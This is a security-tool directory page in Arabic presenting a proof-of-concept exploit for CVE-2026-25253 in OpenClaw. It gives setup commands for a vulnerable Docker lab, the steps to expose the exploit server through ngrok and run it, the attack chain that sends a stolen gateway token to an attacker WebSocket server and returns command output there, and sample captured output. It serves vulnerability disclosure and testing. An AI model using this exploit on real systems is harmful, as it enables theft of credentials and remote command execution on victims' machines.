Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-25253 — استخراج رمز مصادقة OpenClaw | Kitploit
أدوات/GitHubGitHub/eqstlab/cve-2026-25253
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالفريق الأحمرتطوير الحمولات
GitHubeqstlab/cve-2026-25253

CVE-2026-25253

استخراج رمز مصادقة OpenClaw

عرض المستودع
2منذ 3 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-25253 OpenClaw: تنفيذ أكواد عن بُعد بنقرة واحدة

★ CVE-2026-25253 إثبات اختراق (PoC) لثغرة OpenClaw لتنفيذ الأكواد عن بُعد بنقرة واحدة ★

https://github.com/user-attachments/assets/e6957c61-7549-4e68-831e-a05436504a3e

الوصف

CVE-2026-25253 : ثغرة تسريب رمز مصادقة OpenClaw

الوصف: يسمح OpenClaw (المعروف أيضًا باسم clawdbot أو Moltbot) قبل الإصدار v2026.1.29 للمهاجمين بتسريب رمز مصادقة البوابة المخزَّن عن طريق تزويد واجهة التحكم (Control UI) بقيمة gatewayUrl مُصنّعة في سلسلة الاستعلام، مما يؤدي تلقائيًا إلى إنشاء اتصال WebSocket دون تحقق أو تأكيد من المستخدم. ويمكن أن يؤدي ذلك إلى وصول غير مصرح به إلى البوابة وتنفيذ أكواد عن بُعد بنقرة واحدة.

المتطلبات

  • Docker (Docker Desktop على ويندوز)
  • Python 3.x (جهة الهجوم)

الملفات

  • Dockerfile — لبناء بيئة OpenClaw الهشّة
  • templates/ — صفحات ويب خبيثة يستخدمها الاستغلال
  • config.txt — إعدادات OpenClaw المستخدمة في بيئة الضحية
  • exploit.py — خادم الاستغلال
  • requirements.txt — تبعيات إثبات الاختراق (PoC)

إعداد البيئة

  1. إنشاء صورة Docker
root@kitploit:~
docker build -t openclaw-vuln .
  1. تشغيل البيئة (ويندوز)
root@kitploit:~
docker run -d --name openclaw-vuln -p 127.0.0.1:2222:22 openclaw-vuln
  1. إنشاء نفق SSH
root@kitploit:~
ssh-keygen -R [127.0.0.1]:2222
ssh -N -L 18789:127.0.0.1:18789 -p 2222 [email protected]
  • كلمة المرور: openclawlab
  1. الوصول إلى واجهة تحكم OpenClaw افتح عنوان URL التالي في المتصفح
root@kitploit:~
http://127.0.0.1:18789/
  1. أدخل رمز البوابة d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66
  2. انقر على زر Connect
  3. افتح تبويب Config
  4. الصق محتويات config.txt
  5. استبدل حقل مفتاح API بمفتاح OpenAI API الخاص بك
  6. احفظ الإعدادات
  7. تأكد من أن الوكيل (agent) يستجيب بشكل طبيعي

إثبات المفهوم (PoC)

  1. تثبيت التبعيات (جهة الهجوم)
root@kitploit:~
pip3 install -r requirements.txt
  1. عرض خادم الاستغلال عبر HTTPS
root@kitploit:~
wget https://bin.equinox.io/c/bNyj1mQVY4c/ngrok-v3-stable-linux-amd64.tgz
tar xzf ngrok-v3-stable-linux-amd64.tgz
./ngrok authtoken YOUR_TOKEN
./ngrok http 13337
  • انسخ اسم المضيف المُعاد توجيهه الذي تم إنشاؤه
  1. تشغيل خادم الاستغلال
root@kitploit:~
python3 exploit.py --host YOUR_NGROK_HOSTNAME --command "env"

مثال:

root@kitploit:~
python3 exploit.py --host abcd-1234.ngrok-free.app --command "env"
  1. تشغيل الهجوم
  1. افتح الصفحة الخبيثة التي يعرضها خادم الاستغلال
  2. حاكِ تفاعل الضحية مع الصفحة
  3. شغّل مسار الاستغلال من المتصفح

مسار الهجوم

  1. يغيّر عنوان URL خبيث قيمة gatewayUrl في واجهة تحكم الضحية
  2. يتصل المتصفح تلقائيًا بنقطة نهاية WebSocket التي يتحكم فيها المهاجم
  3. يُسرَّب رمز مصادقة البوابة إلى المهاجم
  4. تستخدم الصفحة الخبيثة الرمز المسروق لفتح اتصال WebSocket جديد ببوابة OpenClaw المحلية للضحية
  5. يُرسل طلب تنفيذ أوامر عبر الوكيل (agent)
  6. تُعاد نتيجة التنفيذ إلى خادم المهاجم

النتيجة المتوقعة

  • يتم توجيه متصفح الضحية إلى مسار WebSocket الخبيث
  • يلتقط المهاجم رمز مصادقة البوابة
  • يمكن للمهاجم إرسال طلب تنفيذ أوامر عبر OpenClaw
  • يُعاد ناتج الأوامر إلى خادم المهاجم

ناتج نموذجي

root@kitploit:~
[*] Exploit Server running on: abcd-1234.ngrok-free.app:13337
[*] Gateway token captured: d4b7c7689b82981ff86c735a9f8f616b310491b0d334659a1491c55a13353e66

==================================================
      [!] EXPLOIT RESULT CAPTURED [!]
==================================================
HOSTNAME=openclaw-vuln
PWD=/root
HOME=/root
...
==================================================

ملاحظات

  • يستهدف إثبات الاختراق هذا إصدار OpenClaw 2026.1.24-1
  • تعتمد سلسلة الاستغلال على معالجة gatewayUrl الهشّة في واجهة التحكم (Control UI)
  • للوصول إلى ضحية عن بُعد، يجب تقديم الصفحة الخبيثة عبر HTTPS
  • يتم الوصول إلى بوابة OpenClaw المحلية عبر متصفح الضحية كجسر

رؤية EQST

ننشر تحليلات CVE والبرمجيات الخبيثة مرة واحدة شهريًا. إذا كنت مهتمًا، يرجى متابعة الروابط أدناه للاطلاع على منشوراتنا.

  • KR : https://www.skshieldus.com/security-insights/reports/eqst_openclaw_rce_vulnerability
  • EN : https://www.skshieldus.com/en/report?tab=eqst
تنزيل الأداة